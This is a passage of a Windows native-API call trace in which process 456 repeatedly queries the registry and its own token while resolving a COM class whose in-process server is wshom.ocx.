 02739   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02740   456   NtQueryValueKey  (346,  (346, "InprocServer32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02741   456   NtClose  (346, ... ) == 0x0
 02742   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02743   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02744   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02745   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02746   456   NtClose  (344, ... ) == 0x0
 02747   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02748   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02749   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02750   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02751   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02752   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02753   456   NtClose  (344, ... ) == 0x0
 02754   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02755   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02756   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02757   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02758   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02759   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02760   456   NtClose  (344, ... ) == 0x0
 02761   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02762   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServer32"}, ... 344, ) }, ... 344, ) == 0x0
 02763   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02764   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02765   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02766   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02767   456   NtClose  (352, ... ) == 0x0
 02768   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02769   456   NtQueryValueKey  (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0W\0I\0N\0D\0O\0W\0S\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0o\0m\0.\0o\0c\0x\0\0\0"}, 72, ) }, 72, ) == 0x0
 02770   456   NtClose  (346, ... ) == 0x0
 02771   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02772   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02773   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02774   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02775   456   NtClose  (344, ... ) == 0x0
 02776   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02777   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02778   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02779   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02780   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02781   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02782   456   NtClose  (344, ... ) == 0x0
 02783   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02784   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02785   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02786   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02787   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02788   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02789   456   NtClose  (344, ... ) == 0x0
 02790   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02791   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02792   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02793   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02794   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02795   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02796   456   NtClose  (344, ... ) == 0x0
 02797   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02798   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02799   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02800   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02801   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 344, ) }, ... 344, ) == 0x0
 02802   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02803   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02804   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02805   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02806   456   NtClose  (352, ... ) == 0x0
 02807   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02808   456   NtQueryValueKey  (346,  (346, "AppID", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02809   456   NtClose  (346, ... ) == 0x0
 02810   456   NtClose  (350, ... ) == 0x0
 02811   456   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {452, 0}, ... 348, ) == 0x0
 02812   456   NtQueryInformationProcess  (348, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 02813   456   NtClose  (348, ... ) == 0x0
 02814   456   NtWaitForSingleObject  (84, 0, {0, 0}, ... ) == 0x102
 02815   456   NtWaitForSingleObject  (96, 0, {0, 0}, ... ) == 0x102
 02816   456   NtWaitForSingleObject  (120, 0, {0, 0}, ... ) == 0x0
 02817   456   NtClearEvent  (120, ... ) == 0x0
 02818   456   NtNotifyChangeKey  (124, 120, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x0
 02819   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02820   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02821   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02822   456   NtClose  (348, ... ) == 0x0
 02823   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02824   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02825   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02826   456   NtClose  (348, ... ) == 0x0
 02827   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02828   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02829   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02830   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02831   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02832   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02833   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02834   456   NtClose  (344, ... ) == 0x0
 02835   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02836   456   NtOpenKey  (0x1, {24, 350, 0x40, 0, 0,  (0x1, {24, 350, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02837   456   NtClose  (350, ... ) == 0x0
 02838   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02839   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02840   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02841   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02842   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02843   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02844   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02845   456   NtClose  (344, ... ) == 0x0
 02846   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02847   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServer32"}, ... 344, ) }, ... 344, ) == 0x0
 02848   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02849   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02850   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02851   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02852   456   NtClose  (352, ... ) == 0x0
 02853   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02854   456   NtQueryValueKey  (346,  (346, "InprocServer32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02855   456   NtClose  (346, ... ) == 0x0
 02856   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02857   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02858   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02859   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02860   456   NtClose  (344, ... ) == 0x0
 02861   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02862   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02863   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02864   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02865   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02866   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02867   456   NtClose  (344, ... ) == 0x0
 02868   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02869   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02870   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02871   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02872   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02873   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02874   456   NtClose  (344, ... ) == 0x0
 02875   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02876   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServer32"}, ... 344, ) }, ... 344, ) == 0x0
 02877   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02878   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02879   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02880   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02881   456   NtClose  (352, ... ) == 0x0
 02882   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02883   456   NtQueryValueKey  (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0W\0I\0N\0D\0O\0W\0S\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0o\0m\0.\0o\0c\0x\0\0\0"}, 72, ) }, 72, ) == 0x0
 02884   456   NtClose  (346, ... ) == 0x0
 02885   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02886   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02887   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02888   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02889   456   NtClose  (344, ... ) == 0x0
 02890   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02891   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02892   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02893   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02894   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02895   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02896   456   NtClose  (344, ... ) == 0x0
 02897   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02898   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02899   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02900   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02901   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02902   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02903   456   NtClose  (344, ... ) == 0x0
 02904   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02905   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02906   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}_"}, 162, ) }, 162, ) == 0x0
 02907   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02908   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02909   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02910   456   NtClose  (344, ... ) == 0x0
 02911   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02912   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02913   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02914   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
